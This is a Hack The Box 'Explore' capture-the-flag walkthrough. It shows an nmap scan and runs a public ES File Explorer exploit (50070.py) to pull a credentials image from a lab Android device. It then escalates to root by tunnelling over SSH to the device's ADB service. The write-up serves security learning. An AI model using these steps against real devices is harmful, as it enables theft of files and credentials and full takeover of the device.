HTB `Explore` Walkthrough
One of the most classic step is to run a port scanner … Either you can use your own tool or you can use pre-built tools such as Nmap , Zenmap and many others. Running a port scanner will help you in finding open ports which may have some or the other vulnerability which is useful in further exploitation.
nmap -p- -v 10.10.10.247 -Pn
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–23 06:22 GMT
Initiating Parallel DNS resolution of 1 host. at 06:22
Completed Parallel DNS resolution of 1 host. at 06:22, 0.00s elapsed
Initiating SYN Stealth Scan at 06:22
Scanning 10.10.10.247 [65535 ports]
SYN Stealth Scan Timing: About 8.04% done; ETC: 06:22 (0:05:55 remaining)
Discovered open port 2222/tcp on 10.10.10.247
SYN Stealth Scan Timing: About 25.94% done; ETC: 06:23 (0:18:19 remaining)
SYN Stealth Scan Timing: About 43.33% done; ETC: 06:24 (0:12:50 remaining)
Discovered open port 42135/tcp on 10.10.10.247
SYN Stealth Scan Timing: About 47.27% done; ETC: 06:25 (0:11:37 remaining)
Discovered open port 59777/tcp on 10.10.10.247
SYN Stealth Scan Timing: About 57.30% done; ETC: 06:25 (0:09:17 remaining)
SYN Stealth Scan Timing: About 82.98% done; ETC: 06:25 (0:03:45 remaining)
Discovered open port 41085/tcp on 10.10.10.247
SYN Stealth Scan Timing: About 87.89% done; ETC: 06:26 (0:02:38 remaining)
Stats: 0:04:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 89.67% done; ETC: 06:27 (0:02:14 remaining)
SYN Stealth Scan Timing: About 94.86% done; ETC: 06:27 (0:01:06 remaining)
Completed SYN Stealth Scan at 06:43, 1300.70s elapsed (65535 total ports)
Nmap scan report for 10.10.10.247
Host is up (0.31s latency).
Not shown: 65469 closed ports, 62 filtered ports
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
41085/tcp open unknown
42135/tcp open unknown
59777/tcp open unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 360.84 seconds
Raw packets sent: 70526 (3.103MB) | Rcvd: 67024 (2.681MB)
What I do next is I search for vulnerabilities using Exploit DB on different services which are running on open ports. We have found 3 open ports : 2222 : ssh , 42135 : ES File Explorer & 59777 : Bukkit JSONAPI .
The ES File Explorer creates an HTTP service bound to port 59777 at runtime, which provides 10+ commands for accessing data in user’s cell phone and executing the application; however, the service does not check this request. On running the exploit using python3 we get a list of available commands which we can actually run using that exploit.
Firstly, we can try looking for credentials stored in Pics or in Files.
We can access the files using our browser or via downloading them individually.There is a file named creds.jpg we can download it using the command as follows : python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
One of the major mistake that people usually do while logging into machine using ssh is : if there is any other port specified for ssh (for example in our case it was 2222). Please use -p and specify the port.
After struggling through find and grep command, I tried to search manually for the flag and after about 15 minutes. I found it in sdcard folder.
Now one of the most toughest part of the machine i.e., Privilege Escalation. At this point I had access to the device through SSH, so I tried to check all the listening ports using netstat. Then I came across ADB service running on port 5555. In order to run ADB on the device, I had to set up SSH Tunneling so that I could run ADB commands on the device.
For SSH Tunneling use the command : ssh kristi@10.10.10.247 -p 2222 -L 5555:127.0.0.1:5555
Now moving along with ADB shell commands.
Now all I have to do it figure out where is root.txt. After a searching session in different folders, I found it in data folder.
Good Luck with the machine !!! It was really a fun.